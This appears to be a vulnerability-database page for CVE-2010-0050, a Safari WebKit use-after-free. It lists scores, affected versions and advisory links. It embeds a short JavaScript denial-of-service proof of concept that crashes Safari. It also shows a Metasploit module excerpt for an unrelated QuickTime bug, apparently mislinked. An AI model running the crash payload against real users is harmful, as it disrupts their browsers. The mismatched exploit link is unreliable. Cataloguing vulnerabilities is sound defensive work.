CVE-2010-0050
published 2010-03-15CVE-2010-0050: Use-after-free vulnerability in WebKit in Apple Safari before 4.0.5 allows remote attackers to execute arbitrary code or cause a denial of service (application…
PriorityP352high8.8CVSS 3.1
AVNACLPRNUIRSUCHIHAH
EXPLOIT
EPSS
11.64%
95.5th percentile
Use-after-free vulnerability in WebKit in Apple Safari before 4.0.5 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an HTML document with improperly nested tags.
Affected
10 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apple | iphone_os | >= 2.0 < 4.0 | 4.0 |
| apple | safari | < 4.0.5 | 4.0.5 |
| canonical | ubuntu_linux | — | — |
| canonical | ubuntu_linux | — | — |
| canonical | ubuntu_linux | — | — |
| fedoraproject | fedora | — | — |
| fedoraproject | fedora | — | — |
| fedoraproject | fedora | — | — |
| opensuse | opensuse | — | — |
| opensuse | opensuse | — | — |
CVSS provenance
nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
nvdv2.09.3CRITICALAV:N/AC:M/Au:N/C:C/I:C/A:C
vendor_redhat8.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-x35p-q7vp-559r: Use-after-free vulnerability in WebKit in Apple Safari before 4
ghsa_unreviewed·2022-05-02
CVE-2010-0050 [HIGH] CWE-416 GHSA-x35p-q7vp-559r: Use-after-free vulnerability in WebKit in Apple Safari before 4
Use-after-free vulnerability in WebKit in Apple Safari before 4.0.5 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an HTML document with improperly nested tags.
Red Hat
webkitgtk: multiple security vulnerabilities in WebKit
vendor_redhat·2010-03-11·CVSS 8.8
CVE-2010-0050 [HIGH] webkitgtk: multiple security vulnerabilities in WebKit
webkitgtk: multiple security vulnerabilities in WebKit
Use-after-free vulnerability in WebKit in Apple Safari before 4.0.5 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an HTML document with improperly nested tags.
No detection rules found.
Exploit-DB
QuickTime Streaming Server - 'parse_xml.cgi' Remote Execution (Metasploit)
exploitdb·2010-07-03
CVE-2003-0050 QuickTime Streaming Server - 'parse_xml.cgi' Remote Execution (Metasploit)
QuickTime Streaming Server - 'parse_xml.cgi' Remote Execution (Metasploit)
---
##
# $Id: qtss_parse_xml_exec.rb 9669 2010-07-03 03:13:45Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'QuickTime Streaming Server parse_xml.cgi Remote Execution',
'Description' => %q{
The QuickTime Streaming Server contains a CGI script that is vulnerable
to metacharacter injection, allow arbitrary commands to be executed as root.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9669 $',
'References' =>
[
[ 'OSVDB', '1056
Exploit-DB
Webkit (Apple Safari 4.0.5) - Blink Tag Stack Exhaustion Denial of Service
exploitdb·2010-04-27
CVE-2010-0050 Webkit (Apple Safari 4.0.5) - Blink Tag Stack Exhaustion Denial of Service
Webkit (Apple Safari 4.0.5) - Blink Tag Stack Exhaustion Denial of Service
---
loop1();
var a = "";
function loop1()
{
document.write(a);
setInterval(loop2,0);
}
function loop2()
{
document.write(a);
setInterval(loop1,0);
}
Webkit (Safari) Stack Exhaustion DoS
Found By: Dr_IDE
Credit To: Mattias Karlsson
Reference: http://www.exploit-db.com/exploits/12401
Tested On: Windows 7 + Safari 4.0.5
http://lists.apple.com/archives/security-announce/2010/Jun/msg00003.htmlhttp://lists.apple.com/archives/security-announce/2010/Mar/msg00000.htmlhttp://lists.fedoraproject.org/pipermail/package-announce/2010-May/041383.htmlhttp://lists.fedoraproject.org/pipermail/package-announce/2010-May/041432.htmlhttp://lists.fedoraproject.org/pipermail/package-announce/2010-May/041436.htmlhttp://lists.opensuse.org/opensuse-security-announce/2011-01/msg00006.htmlhttp://secunia.com/advisories/41856http://secunia.com/advisories/43068http://support.apple.com/kb/HT4070http://support.apple.com/kb/HT4225http://www.mandriva.com/security/advisories?name=MDVSA-2011:039http://www.securityfocus.com/bid/38671http://www.securitytracker.com/id?1023708http://www.ubuntu.com/usn/USN-1006-1http://www.vupen.com/english/advisories/2010/2722http://www.vupen.com/english/advisories/2011/0212http://www.vupen.com/english/advisories/2011/0552https://exchange.xforce.ibmcloud.com/vulnerabilities/56836https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A7587http://lists.apple.com/archives/security-announce/2010/Jun/msg00003.htmlhttp://lists.apple.com/archives/security-announce/2010/Mar/msg00000.htmlhttp://lists.fedoraproject.org/pipermail/package-announce/2010-May/041383.htmlhttp://lists.fedoraproject.org/pipermail/package-announce/2010-May/041432.htmlhttp://lists.fedoraproject.org/pipermail/package-announce/2010-May/041436.htmlhttp://lists.opensuse.org/opensuse-security-announce/2011-01/msg00006.htmlhttp://secunia.com/advisories/41856http://secunia.com/advisories/43068http://support.apple.com/kb/HT4070http://support.apple.com/kb/HT4225http://www.mandriva.com/security/advisories?name=MDVSA-2011:039http://www.securityfocus.com/bid/38671http://www.securitytracker.com/id?1023708http://www.ubuntu.com/usn/USN-1006-1http://www.vupen.com/english/advisories/2010/2722http://www.vupen.com/english/advisories/2011/0212http://www.vupen.com/english/advisories/2011/0552https://exchange.xforce.ibmcloud.com/vulnerabilities/56836https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A7587
2010-03-15
Published